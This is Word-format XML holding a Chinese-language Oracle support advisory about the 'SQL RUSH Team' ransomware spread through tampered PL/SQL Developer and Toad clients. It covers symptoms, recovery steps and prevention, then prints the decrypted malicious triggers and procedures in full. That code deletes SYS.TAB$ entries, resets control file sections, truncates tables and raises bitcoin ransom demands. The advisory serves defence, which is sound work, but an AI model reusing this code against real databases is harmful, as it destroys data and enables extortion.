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40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="252525"/>
          <w:kern w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>对数据库的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:kern w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40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252525"/>
          <w:kern w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>比特币攻击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:kern w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40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252525"/>
          <w:kern w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>及防护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0"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>对数据库的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
          <w:color w:val="252525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252525"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>比特币攻击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
          <w:color w:val="252525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252525"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>及防护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ALERT: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数据库存在遭受比特币攻击的风险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________________________________________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In this Document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Description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Occurrence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Symptoms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Workaround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References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________________________________________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APPLIES TO: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Oracle Database - any Edition - any Version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Information in this document applies to any platform.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用户使用客户端连接数据库或者数据库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Alert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日志中出现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ORA-20312/ORA-20313/ORA-20315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等报错信息，描述数据库已被锁死，需要发送比特币到某个地址来解锁数据库。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OCCURRENCE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客户使用被恶意篡改的绿色版或破解版的客户端软件（如破解的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PL/SQL Developer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或者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Toad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等软件）去连接数据库，在此类软件中，在连接成功后，调用注入的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脚本（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Login.sql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AfterConnect.sql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、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toad.ini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等）执行恶意代码，在数据库中生成三个触发器和四个存储过程。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当数据库重启或者用户连接数据库时，触发器会调用相应的存储过程操作数据库。这些存储过程会可能会破坏数据库，并抛出错误信息和提示信息。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SYMPTONS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用户使用客户端连接数据库或者数据库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Alert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日志中出现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ORA-20312/ORA-20313/ORA-20315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等报错信息，描述数据库已被锁死，需要发送比特币到某个地址来解锁数据库。这些注入脚本伪装成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Oracle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内部程序：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Copyright (c) 1988, 2011, Oracle and/or its affiliates.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All rights reserved.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NAME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login.sql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DESCRIPTION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PL/SQL global login "site profile" file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Add any PL/SQL commands here that are to be executed when a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user starts PL/SQL, or uses the PL/SQL CONNECT command.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USAGE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This script is automatically run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This SQL was created by Oracle ; You should never remove/delete it!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MODIFIED (MM/DD/YY)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-- ……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两个已知的报错信息如下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例子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1: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Alert.log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信息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Thu Apr 13 13:48:55 2017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Errors in file /oracle/diag/rdbms/liantiaodb/liantiaodb/trace/liantiaodb_ora_5213.trc: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ORA-00604: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递归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级别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出现错误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ORA-20315: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你的数据库已被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 RUSH Team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锁死 发送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个比特币到这个地址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166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (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大小写一致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之后把你的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Oracle SID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邮寄地址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sqlrush@mail.com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我们将让你知道如何解锁你的数据库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Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.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ORA-06512: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在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"AIQRY.DBMS_CORE_INTERNAL ", line 25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ORA-06512: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在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line 2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例子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使用客户端连接数据库时报错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数据库中存在被加密的存储过程，名字如下：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"DBMS_SUPPORT_INTERNAL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 SYSTEM_INTERNAL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 CORE_INTERNAL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"DBMS_STANDARD_FUN9"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三个触发器名字如下：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"DBMS_SUPPORT_INTERNAL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 SYSTEM_INTERNAL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 CORE_INTERNAL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WORKAROUND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针对现在已经发现的比特币攻击问题的处理方法如下：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删除被恶意篡改的客户端软件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根据不同的情况进行处理：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情况一：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SYSDATE-MIN(LAST_ANALYZED)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小于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1200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天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数据库损坏情况：未损坏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处理办法：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删除三个触发器：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"DBMS_SUPPORT_INTERNAL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 SYSTEM_INTERNAL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 CORE_INTERNAL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删除四个存储过错：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"DBMS_SUPPORT_INTERNAL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 SYSTEM_INTERNAL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 CORE_INTERNAL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"DBMS_STANDARD_FUN9"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情况二：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SYSDATE-MIN(LAST_ANALYZED)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大于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1200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天，并且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SYSDATE-CREATED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大于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1200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天但未重启 或者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SYSDATE-CREATED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小于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1200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天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数据库损坏情况：某些表被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truncate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处理方法：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删除三个触发器和四个存储过程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使用备份把表恢复到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truncate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之前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c.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DUL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恢复（不一定能恢复所有的表，如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truncate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的空间已被使用）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情况三：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SYSDATE-CREATED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大于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1200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天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数据库损坏情况：某些表被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truncate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以及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tab$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被删除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处理方法：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删除三个触发器和四个存储过程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使用备份把表恢复到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truncate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之前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c.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ORACHK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开头的表恢复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tab$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d.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DUL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恢复（不一定能恢复所有的表，如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truncate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的空间已被使用）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针对比特币攻击的预防措施：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1.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监控数据库中是否有相应的触发器和存储过程。及时删除相应触发器和存储过程。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限制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DBA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权限的使用。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检查相关登录工具的自动化脚本，清理有风险的脚本：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SQL*PLUS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中的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glogin.sql/login.sql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Toad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中的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toad.ini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PL/SQL Developer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中的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ogin.sql/AfterConnect.sql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建议从官网下载工具，不要使用绿色版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破解版等。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REFERENCES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三个触发器的代码：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PROMPT Create "DBMS_SUPPORT_INTERNAL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create or replace trigger "DBMS_SUPPORT_INTERNAL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after startup on database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"DBMS_SUPPORT_INTERNAL ";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CREATE OR REPLACE TRIGGER "DBMS_SYSTEM_INTERNAL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AFTER LOGON ON DATABASE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"DBMS_SYSTEM_INTERNAL ";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CREATE OR REPLACE TRIGGER "DBMS_CORE_INTERNAL "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AFTER LOGON ON SCHEMA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"DBMS_CORE_INTERNAL ";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四个加密的存储过程的代码解密后如下：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PROCEDURE "DBMS_SUPPORT_INTERNAL " IS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DATE1 INT :=10;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E1 EXCEPTION;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PRAGMA EXCEPTION_INIT(E1, -20312);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SELECT NVL(TO_CHAR(SYSDATE-CREATED ),0) INTO DATE1 FROM V$DATABASE;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IF (DATE1&gt;=1200)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EXECUTE IMMEDIATE 'create table ORACHK'||SUBSTR(SYS_GUID,10)||' tablespace system as select * from sys.tab$';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DELETE SYS.TAB$ WHERE DATAOBJ# IN (SELECT DATAOBJ# FROM SYS.OBJ$ WHERE OWNER# NOT IN (0,38)) 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EXECUTE IMMEDIATE 'alter system checkpoint';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SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(11);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SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(12);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SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(13);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SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(14);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FOR I IN 1..2046 LOOP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DBMS_SYSTEM.KSDWRT(2, 'Hi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DBMS_SYSTEM.KSDWRT(2, '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你的数据库已被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 RUSH Team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锁死 发送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个比特币到这个地址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166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (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大小写一致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之后把你的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Oracle SID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邮寄地址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sqlrush@mail.com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我们将让你知道如何解锁你的数据库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RAISE E1;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 IF;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WHEN E1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RAISE_APPLICATION_ERROR(-20312,'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你的数据库已被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 RUSH Team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锁死 发送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个比特币到这个地址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166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (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大小写一致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之后把你的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Oracle SID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邮寄地址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sqlrush@mail.com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我们将让你知道如何解锁你的数据库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WHEN OTHERS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NULL;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PROCEDURE "DBMS_SYSTEM_INTERNAL " IS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DATE1 INT :=10;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E1 EXCEPTION;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PRAGMA EXCEPTION_INIT(E1, -20313);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SELECT NVL(TO_CHAR(SYSDATE-MIN(LAST_ANALYZED)),0) INTO DATE1 FROM ALL_TABLES WHERE TABLESPACE_NAME NOT IN ('SYSTEM','SYSAUX','EXAMPLE');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IF (DATE1&gt;=1200)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IF (UPPER(SYS_CONTEXT('USERENV', 'MODULE'))!='C89239.EXE')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RAISE E1;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 IF;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 IF;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WHEN E1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RAISE_APPLICATION_ERROR(-20313,'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你的数据库已被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 RUSH Team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锁死 发送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个比特币到这个地址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166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (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大小写一致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之后把你的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Oracle SID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邮寄地址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sqlrush@mail.com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我们将让你知道如何解锁你的数据库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WHEN OTHERS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NULL;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PROCEDURE "DBMS_CORE_INTERNAL " IS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V_JOB NUMBER;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DATE1 INT :=10;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STAT VARCHAR2(2000);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V_MODULE VARCHAR2(2000);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E1 EXCEPTION;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PRAGMA EXCEPTION_INIT(E1, -20315);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CURSOR TLIST IS SELECT * FROM USER_TABLES WHERE TABLE_NAME NOT LIKE '%$%' AND TABLE_NAME NOT LIKE '%ORACHK%' AND CLUSTER_NAME IS NULL;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SELECT NVL(TO_CHAR(SYSDATE-MIN(LAST_ANALYZED)),0) INTO DATE1 FROM ALL_TABLES WHERE TABLESPACE_NAME NOT IN ('SYSTEM','SYSAUX','EXAMPLE');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IF (DATE1&gt;=1200)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FOR I IN TLIST LOOP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DBMS_OUTPUT.PUT_LINE('table_name is ' ||I.TABLE_NAME);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STAT:='truncate table '||USER||'.'||I.TABLE_NAME;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DBMS_JOB.SUBMIT(V_JOB, 'DBMS_STANDARD_FUN9(''' || STAT || ''');', SYSDATE);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 LOOP;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 IF;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IF (UPPER(SYS_CONTEXT('USERENV', 'MODULE'))!='C89239.EXE')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RAISE E1;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 IF;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EXCEPTION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WHEN E1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RAISE_APPLICATION_ERROR(-20315,'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你的数据库已被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 RUSH Team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锁死 发送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个比特币到这个地址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166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (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大小写一致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之后把你的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Oracle SID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邮寄地址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sqlrush@mail.com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我们将让你知道如何解锁你的数据库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WHEN OTHERS THEN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RAISE_APPLICATION_ERROR(-20315,'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你的数据库已被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 RUSH Team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锁死 发送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个比特币到这个地址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166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (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大小写一致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之后把你的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Oracle SID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邮寄地址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sqlrush@mail.com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252525"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>我们将让你知道如何解锁你的数据库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Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.');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PROCEDURE DBMS_STANDARD_FUN9(V_DDL IN VARCHAR2)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EXECUTE IMMEDIATE V_DDL;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END;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7"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27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ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Calibri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bidi w:val="0"/>
        <w:spacing w:before="210" w:beforeAutospacing="0" w:after="210" w:afterAutospacing="0"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="595959"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>来自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595959"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Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Calibri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Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://blogs.oracle.com/cnsupport_news/%e5%af%b9%e6%95%b0%e6%8d%ae%e5%ba%93%e7%9a%84%e2%80%9c%e6%af%94%e7%89%b9%e5%b8%81%e6%94%bb%e5%87%bb%e2%80%9d%e5%8f%8a%e9%98%b2%e6%8a%a4" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Calibri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宋体" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>https://blogs.oracle.com/cnsupport_news/%e5%af%b9%e6%95%b0%e6%8d%ae%e5%ba%93%e7%9a%84%e2%80%9c%e6%af%94%e7%89%b9%e5%b8%81%e6%94%bb%e5%87%bb%e2%80%9d%e5%8f%8a%e9%98%b2%e6%8a%a4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Calibri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default" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Calibri"/>
          <w:color w:val="595959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Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
          <w:color w:val="969696"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Created with Microsoft OneNote 2016.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2020-05-19T08:32:31Z</dcterms:created>
  <dc:creator>xians</dc:creator>
  <cp:lastModifiedBy>Chris</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-19T08:32:52Z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